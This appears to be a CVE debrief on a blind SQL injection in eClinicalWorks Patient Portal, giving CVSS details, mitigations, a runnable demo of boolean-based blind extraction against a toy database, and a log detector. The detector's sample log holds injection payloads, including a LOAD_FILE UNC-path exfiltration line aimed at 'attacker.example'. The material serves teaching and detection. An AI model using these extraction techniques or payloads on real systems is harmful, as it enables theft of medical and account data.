PatchSiren cyber security CVE debrief
CVE-2017-5570 Eclinicalworks CVE debrief
CVE-2017-5570 describes an authenticated blind SQL injection in eClinicalWorks Patient Portal 7.0 build 13, exposed through messageJson.jsp. According to the CVE record, the flaw is triggered with an HTTP POST request and can be used to extract database contents via out-of-band techniques. The recorded CVSS 3.0 score is 8.8 (HIGH): any valid portal account is enough (PR:L), no user interaction is needed, and a successful attack compromises the confidentiality, integrity and availability of the backing database (C:H/I:H/A:H).
- Vendor
- eClinicalWorks
- Product
- Patient Portal 7.0 build 13
- CVSS
- HIGH 8.8
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2017-01-23
- Original CVE updated
- 2026-05-13
- Advisory published
- 2017-01-23
- Advisory updated
- 2026-05-13
Who should care
Organizations running eClinicalWorks Patient Portal 7.0 build 13 should treat this as a priority, especially teams responsible for application security, database administration, and identity/access controls. It is most relevant where the portal is internet-facing or otherwise reachable by a broad user population: the required privilege level is low, so any ordinary portal account that can reach the affected endpoint is a viable starting point.
Technical summary
NVD maps this issue to CWE-89 and lists the affected CPE as eclinicalworks patient_portal 7.0. The vulnerability is a blind SQL injection in messageJson.jsp, exploitable by an authenticated user via HTTP POST. "Blind" means the application response does not echo query results, so an attacker infers data one condition at a time (a true/false or timing oracle) or, as the record describes, moves it out-of-band using methods such as select_loadfile(): the database server itself is made to contact an attacker-controlled host, with the stolen data encoded in the request (the classic form on MySQL is LOAD_FILE() with a UNC path, which triggers an outbound SMB connection). The record does not name the database engine, so verify which out-of-band channels apply to your deployment. The CVSS vector (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) indicates network reachability, low attack complexity, a low-privilege account as the only precondition, and high impact if exploited.
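To make the CWE-89 pattern and the "blind" oracle concrete, the following is an added example written for this debrief; it is not eClinicalWorks code, and the parameter names, table layout and sqlite3 stand-in database are assumptions (the real parameters of messageJson.jsp are not published in the supplied record). It pairs a concatenating lookup with a parameterized one, then runs a boolean-based blind extraction against both: the only signal the attacker gets is whether rows come back, yet that is enough to recover a value character by character. The out-of-band channel the record describes needs a database that can open outbound connections, which sqlite cannot, but the root defect that enables either technique is the same string concatenation shown here.

```python
import sqlite3
import string


def build_db():
    """Constructed stand-in for a portal database: messages, plus a table the attacker wants."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, owner TEXT, body TEXT)")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO messages (owner, body) VALUES (?, ?)",
                     [("alice", "hello"), ("bob", "hi")])
    conn.execute("INSERT INTO users VALUES ('admin', 'hunter2')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, owner, msg_id):
    """CWE-89 pattern (hypothetical): POST parameters spliced into the statement text."""
    sql = f"SELECT body FROM messages WHERE owner = '{owner}' AND id = {msg_id}"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, owner, msg_id):
    """Same lookup with bound parameters; the numeric id is validated as an integer first."""
    sql = "SELECT body FROM messages WHERE owner = ? AND id = ?"
    return conn.execute(sql, (owner, int(msg_id))).fetchall()


def extract_secret(conn, lookup, max_len=32):
    """Boolean-based blind extraction: the only oracle is whether the call returns rows."""
    charset = string.ascii_lowercase + string.digits
    found = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            # Payload rides in the id parameter; the subquery targets data the caller never asked for.
            probe = (f"1 AND substr((SELECT secret FROM users WHERE name = 'admin'), "
                     f"{pos}, 1) = '{ch}'")
            try:
                rows = lookup(conn, "alice", probe)
            except (ValueError, sqlite3.Error):
                return found  # the hardened path rejects the payload before it reaches SQL
            if rows:
                found += ch
                break
        else:
            return found  # no character matched at this position: end of the value
    return found


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", extract_secret(db, lookup_vulnerable))
    print("hardened:  ", repr(extract_secret(db, lookup_hardened)))
```

Against the concatenating lookup the loop recovers the whole secret from nothing but row-present/row-absent answers; against the parameterized lookup the first probe fails integer validation and nothing is learned. Binding the value (rather than escaping it) is what closes the hole; the integer check is an additional, cheap layer for identifiers.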
Defensive priority
High. The issue requires authenticated access, but once that condition is met, the impact is severe and includes potential database disclosure. Prioritize any affected portal instances, especially if they are internet-facing or used by many users.
Recommended defensive actions
- Confirm whether any deployment is running eClinicalWorks Patient Portal 7.0 build 13 or another affected release.
- Apply vendor remediation or move to a fixed version if one is available.
- Review the code behind messageJson.jsp and any shared data-access layer it calls: every POST parameter that reaches SQL must be bound as a query parameter rather than concatenated into statement text, and numeric identifiers should be validated as integers before use. Escaping alone is not a fix.
- Restrict authenticated access to the portal to the smallest practical set of users and networks.
- Monitor application and database logs for unusual POST activity to messageJson.jsp, bursts of near-identical queries that differ only in a compared character or offset (blind enumeration), time-delay functions, and file-read functions. Out-of-band extraction shows up as the database host itself opening DNS, SMB or HTTP connections to unexpected destinations, so alert on and, where possible, block egress from the database server.
- Review database account privileges used by the portal and reduce them to the minimum required; in particular the portal's account should not hold file-access privileges (on MySQL, the FILE privilege that LOAD_FILE() depends on) or read access to tables the portal does not use.
- If compromise is suspected, investigate for data access beyond normal portal use and rotate any credentials that may have been exposed.
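The monitoring step above is easiest to reason about with something runnable, so here is an added example (not part of the original debrief or of any vendor tooling) that scans a database query log for the three indicator classes a blind or out-of-band injection leaves behind: file-read calls with a UNC path, time-delay functions, and repeated queries from one client that differ only in the probed offset or character. The log format, client addresses and statements are constructed for the example; the function names checked (LOAD_FILE, SLEEP, BENCHMARK, SUBSTR and friends) assume a MySQL-style backend, which the record hints at but does not confirm, so adapt the patterns to your engine.

```python
import re
from collections import Counter

# Constructed sample query log (not real eClinicalWorks data): one statement per line,
# fields separated by "|": timestamp | client address | SQL statement as executed.
SAMPLE_LOG = [
    r"2017-01-23T10:00:01Z|10.0.0.5|SELECT body FROM messages WHERE owner = 'alice' AND id = 17",
    r"2017-01-23T10:00:02Z|10.0.0.5|SELECT body FROM messages WHERE owner = 'alice' AND id = 18",
    r"2017-01-23T10:00:03Z|10.0.0.9|SELECT body FROM messages WHERE owner = 'bob' AND id = 1 AND substr((SELECT secret FROM users LIMIT 1),1,1)='a'",
    r"2017-01-23T10:00:03Z|10.0.0.9|SELECT body FROM messages WHERE owner = 'bob' AND id = 1 AND substr((SELECT secret FROM users LIMIT 1),1,1)='b'",
    r"2017-01-23T10:00:03Z|10.0.0.9|SELECT body FROM messages WHERE owner = 'bob' AND id = 1 AND substr((SELECT secret FROM users LIMIT 1),1,1)='c'",
    r"2017-01-23T10:00:04Z|10.0.0.9|SELECT body FROM messages WHERE owner = 'bob' AND id = 1 AND substr((SELECT secret FROM users LIMIT 1),2,1)='a'",
    r"2017-01-23T10:00:05Z|10.0.0.9|SELECT body FROM messages WHERE owner = 'bob' AND id = 1 AND SLEEP(5)",
    r"2017-01-23T10:00:06Z|10.0.0.9|SELECT LOAD_FILE(CONCAT('\\\\', (SELECT secret FROM users LIMIT 1), '.attacker.example\\share'))",
]

# Indicator patterns (MySQL-flavoured; assumption, the record does not name the engine).
TIME_BASED = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\b", re.I)
FILE_FUNC = re.compile(r"\bLOAD_FILE\s*\(", re.I)
CHAR_PROBE = re.compile(r"\b(SUBSTR|SUBSTRING|MID|ASCII|ORD)\s*\(", re.I)
STRING_LIT = re.compile(r"'(?:[^'\\]|\\.)*'")
NUMBER = re.compile(r"\b\d+\b")


def shape(stmt):
    """Collapse literals so probes that differ only in position or character compare equal."""
    return NUMBER.sub("N", STRING_LIT.sub("'?'", stmt))


def parse(line):
    ts, client, stmt = line.split("|", 2)
    return ts, client, stmt


def analyze(lines, threshold=3):
    """Return findings: per-statement indicators plus repeated character-probe shapes per client."""
    findings = []
    probe_shapes = Counter()
    for lineno, line in enumerate(lines, 1):
        _ts, client, stmt = parse(line)
        if FILE_FUNC.search(stmt):
            # A UNC prefix inside a file-read call is the out-of-band (SMB) exfiltration signature.
            detail = "LOAD_FILE with UNC path" if "\\\\" in stmt else "LOAD_FILE"
            findings.append({"kind": "oob_exfil", "client": client, "line": lineno, "detail": detail})
        m = TIME_BASED.search(stmt)
        if m:
            findings.append({"kind": "time_based", "client": client, "line": lineno, "detail": m.group(1)})
        if CHAR_PROBE.search(stmt):
            probe_shapes[(client, shape(stmt))] += 1
    for (client, s), n in probe_shapes.items():
        if n >= threshold:
            findings.append({"kind": "boolean_enumeration", "client": client, "count": n, "detail": s})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

The shape-counting check is the one worth keeping even if you change nothing else: a legitimate message lookup never embeds substr() over a subquery, and a blind enumeration cannot avoid issuing dozens of structurally identical statements. Pair it with egress monitoring on the database host, since the LOAD_FILE indicator only appears in a query log if query logging is on, whereas the outbound SMB or DNS attempt is visible at the network layer regardless.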
Evidence notes
The core vulnerability details come from the supplied CVE/NVD record: CVE-2017-5570, published 2017-01-23 and last modified 2026-05-13, with CWE-89 and CVSS 3.0 vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. The record explicitly states the issue is a blind SQL injection in messageJson.jsp, exploitable by authenticated users via HTTP POST, and usable for out-of-band database extraction. The supplied reference list includes SecurityFocus BID 95742 and a mirrored gist advisory, which corroborate the classification. No KEV listing was provided in the supplied enrichment.
Official resources
- CVE-2017-5570 CVE record (CVE.org)
- CVE-2017-5570 NVD detail (NVD)
- Source item URL: nvd_modified
- Mitigation or vendor reference: Third Party Advisory, VDB Entry
- Mitigation or vendor reference: Third Party Advisory
The two reference entries above correspond to the SecurityFocus BID 95742 and the mirrored gist advisory named in the evidence notes; neither is a vendor fix notice.
Publicly disclosed on 2017-01-23; CVE record last modified on 2026-05-13.